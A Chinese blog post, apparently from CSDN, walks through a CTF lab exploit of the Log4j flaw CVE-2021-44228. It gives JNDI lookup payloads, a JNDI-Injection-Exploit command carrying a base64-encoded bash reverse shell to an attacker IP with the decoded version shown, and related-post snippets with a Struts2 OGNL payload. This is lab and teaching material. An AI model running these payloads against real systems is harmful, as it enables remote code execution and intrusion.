NSSCTF实战:Apache log4j漏洞靶机(CVE-2021-44228)

已于 2023-05-09 20:00:49 修改
阅读量422 收藏 1
点赞数
文章标签: apache log4j java
于 2023-05-09 19:59:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52270928/article/details/130587525
版权

1、漏洞描述

2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。12月9号进行了漏洞预警,然后整个安全圈就过年了。

Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对用户输入内容进行严格的判断,从而造成漏洞的发生。

漏洞编号:CVE-2021-44228

影响范围:Apache Log4j 2.x < 2.15.0-rc2

2、实验环境

NSSCTF平台实战:Apache log4j漏洞靶机

3、开启环境

浏览器访问得到以下结果

4、漏洞复现

根据题目描述,直接找到入口路由为/webstudy/hello-fengxuan,POST参数为c

准备dnslog.cn,Get SubDomain的网站域名为y3r9ua.dnslog.cn

访问存在的页面:http://node4.anna.nssctf.cn:28461/webstudy/hello-fengxuan,其中c为可控POST参数,后台未对前端用户传递的c参数进行校验导致存在命令执行漏洞,提交payload:${jndi:ldap://y3r9ua.dnslog.cn}

在dnslog平台,点击Refresh Record按钮,检测到dns查询的信息,证明存在log4j漏洞

5、漏洞利用

利用工具为JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,该工具是由welk1n写的JNDI注入利用工具

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互

工具介绍

开始复现

第一步:在攻击机上开启7878监听端口

第2步:获取rmi和ldap参数

攻击机IP地址为x.x.x.x,拷贝JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar到攻击机

然后在攻击机中执行以下命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c “{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54Lzc4NzggMD4mMQ==}|{base64,-d}|{bash,-i}” -A x.x.x.x

以上命令,base64解密后为

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c “{echo,bash -i >& /dev/tcp/x.x.x.x/7878 0>&1}|{base64,-d}|{bash,-i}” -A x.x.x.x

以上命令执行会反弹shell到攻击机的ip地址,攻击机需要监听7878端口,在攻击机下执行后的结果如下图所示

得到rmi和ldap的值,然后利用该值构造漏洞利用的payload

第3步:执行payload

构造好的payload为:${jndi:rmi://x.x.x.x:1099/67c6wi}

在浏览器前端执行构造好的payload

 

kalakala789
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-Apache Struts2远程代码执行漏洞(S2-007)复现
asd158923328的博客
08-21 421
根据题意 形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。 进入环境,查看源码, 限制了三个输入框的的值只能为text,而且长度在540以上, 然后在登录界面用户名和邮箱值随意,age部分改为我们的payload ’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java...
CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
靶机渗透练习07-HackMyVm Area51 (Log4j2复现)
Force~
03-31 2842
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51 网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover.
log4j2远程代码执行漏洞原理与漏洞复现
人若无名,便可专心练剑
03-20 1664
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞复现》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4580
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE-2021-44228-log4j2复现详细版本-简单教程。
weixin_42109829的博客
12-14 5267
0x01-前言 昨晚爆出的log4j rce 是通过lookup触发的漏洞,但jdk1.8.191以上默认不支持ldap协议,对于高版本jdk,则需要一定的依赖。不过为了给大家最简单的说明,我这里还是用jdk1.8.144的版本来运行。 0x02-靶场搭建 docker 搭建方式 docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln docker run -it -d -p 8080:8080 --name log4j_vuln_
CTF-Apache Struts2远程代码执行漏洞(S2-032)复现
asd158923328的博客
08-22 832
根据题意 漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp: %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setChara...
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
最新发布
04-04
MSF辅助模块Auxiliary,Exploit应用,CVE-2015-1635漏洞攻防实战
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中存在反序列化远程代码执行漏洞.攻击者可利用该漏洞执行任意恶意命令.在Log4j 1.2.X中包含一个SocketServer类,该类很容易对不可信数据进行反序列化,当侦听日志数据的不可信网络流量时,与反序列化小工具结合使用时,可以利用该类远程执行任意代码.影响包含目前最新版本. 2. 漏洞危害 高危 影响范围 1.2.4 <= Apache Log4j <= 1.2.17(最新版) 修复建议 1.升级到Apache Log4j 2系列最新版 2.禁止将该类所开启的socket端口暴露到互联网 3. 漏洞验证 Apac
CTF-Apache Struts2远程代码执行漏洞(S2-015)复现
asd158923328的博客
08-21 756
根据题意 针对 Action 名称进行默认字符限制 [a-z][A-Z][0-9][.-_!/] 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:/{1}.jsp 上述配置能让我们访问 name.action 时使用 name.jsp来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践...
apache log4j 2(CVE-2021-44228)漏洞复现
net的博客
04-04 847
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实现,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j。
apache 报错信息隐藏_CTF之信息泄漏
weixin_35945980的博客
12-08 392
web源码泄漏.hg源码泄漏:漏洞成因:hg init的时候会生成.hg,http://www.xx.com/.hg/,工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/).git源码泄漏:漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导...
NSSCTF实战Apache HTTPD 多后缀解析漏洞
weixin_52270928的博客
05-17 511
Apache文件解析漏洞涉及到一个Apache解析文件的特性,Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别。那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为php文件进行解析。
ctfshow log4j复现 wp|CVE-2021-44228
spring!
03-24 4357
ctfshow log4j复现 wp|CVE-2021-44228
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3539
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
ctf bugku Apache Log4j2 RCE解题
YouthBelief的博客
03-08 4348
0x00 环境准备 工具地址 https://github.com/welk1n/JNDI-Injection-Exploit 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html dnslog地址 http://www.dnslog.cn/ 0x01 工具配置 $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git $ cd JNDI-
cve-2018-2628
08-15
CVE-2018-2628是一个Java反序列化漏洞。根据引用,可以通过执行特定的代码来利用该漏洞。具体来说,使用ysoserial-0.1-cve-2018-2628-all.jar工具生成恶意payload,然后通过JRMPClient2进行远程代码执行。在这个过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值